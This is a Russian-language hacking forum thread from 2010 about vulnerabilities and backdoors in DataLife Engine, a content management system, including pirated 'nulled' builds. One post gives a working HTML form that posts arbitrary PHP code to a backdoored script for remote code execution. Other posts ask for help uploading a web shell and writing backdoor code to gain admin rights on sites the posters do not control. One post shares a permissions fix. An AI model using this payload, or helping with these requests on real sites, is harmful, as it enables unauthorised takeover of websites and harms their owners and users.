HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [ Обзор уязвимостей DataLife Engine ]
   
Ответ
Страница 14 из 39 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.04.2010, 06:21
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию
Я думаю таких сайтов много с этим бедкодером это относиться к null версиям dle.

К примеру DataLife Engine v.8.5 Nulled by M.I.D-Team

Так что с этим можно сделать?

В этой папке нету файла .htaccess
Последний раз редактировалось Rew; 30.04.2010 в 06:27..
 
Ответить с цитированием

  #2  
Старый 30.04.2010, 10:43
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию
Цитата:
Так что с этим можно сделать?
В чём проблема? Пошли ему post с кодом, например через copy()
 
Ответить с цитированием

  #3  
Старый 30.04.2010, 13:17
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию
Цитата:
Сообщение от Komyak  
В чём проблема? Пошли ему post с кодом, например через copy()
Проблема в том что я не знаю как и что нужно и куда послать и через чё.

Где об этом можно хоть статью почитать или книжку что да как?

Цитата:
Rew, где ты там(Nulled by M.I.D-Team) увидел этот код?
В \upload\engine\ajax

keywords.php

http://slil.ru/29061005
Последний раз редактировалось Rew; 30.04.2010 в 13:27..
 
Ответить с цитированием

  #4  
Старый 30.04.2010, 11:20
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию
Rew, где ты там(Nulled by M.I.D-Team) увидел этот код?
 
Ответить с цитированием

  #5  
Старый 30.04.2010, 13:43
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию
Цитата:
Проблема в том что я не знаю как
http://php.net/manual/en/reserved.variables.post.php
http://php.net/manual/en/function.copy.php
Создавай форму(html) или просто курлом посылай.

А где дырка?- http://pastebin.com/Xj9kADx1
 
Ответить с цитированием

  #6  
Старый 30.04.2010, 13:54
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию
 
Ответить с цитированием

  #7  
Старый 30.04.2010, 16:14
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
попробуй так
PHP код:
<form name="eval" action="http://script.ru/script.php" method="post">
<input type="text" name="text" value="phpinfo();"><br />
<input type="submit" name="submit" value="хряп">
</form
вместо http://script.ru/script.php путь до твоего скрипта там где бекдор нашел, вместо phpinfo(); можеш любой php код писать.
 
Ответить с цитированием

dle 5 и shell
  #8  
Старый 20.05.2010, 13:34
simca
Новичок
Регистрация: 06.05.2010
Сообщений: 1
Провел на форуме:
11064

Репутация: 0
По умолчанию dle 5 и shell
Здравствуйте, я новичек на форуме, поэтому сразу извиняюсь, если пост не сюда. Вопрос следующего характера, как можно залить шелл в dle 4.2 если нет доступа в админпанель, а есть только доступ к cnstats, установленного на этом сайте
 
Ответить с цитированием

  #9  
Старый 31.05.2010, 08:57
m00nster
Новичок
Регистрация: 24.04.2010
Сообщений: 3
Провел на форуме:
17830

Репутация: 1
По умолчанию
Доброе время суток.
Помогите написать код для бэкдора от -=ZLOY=-,чтоб получить доступ в АП, и быть в user_group 1

В этом деле я новичок,прошу вас,напишите подробно что да как
 
Ответить с цитированием

  #10  
Старый 31.05.2010, 23:05
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию
Код:
http://forum.searchengines.ru/showthread.php?t=504108
Цитата:
Приветствую, уважаемые!

В последние несколько дней были взломаны сайты типа осетрина, amxсервер и т.д. мегакулхацкерами, думаю они на этом не остановятся, поэтому палю заплатку для новорожденной дыры - поставить права 765 на папку data.
детали не известны
 
Ответить с цитированием
Ответ
Страница 14 из 39 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.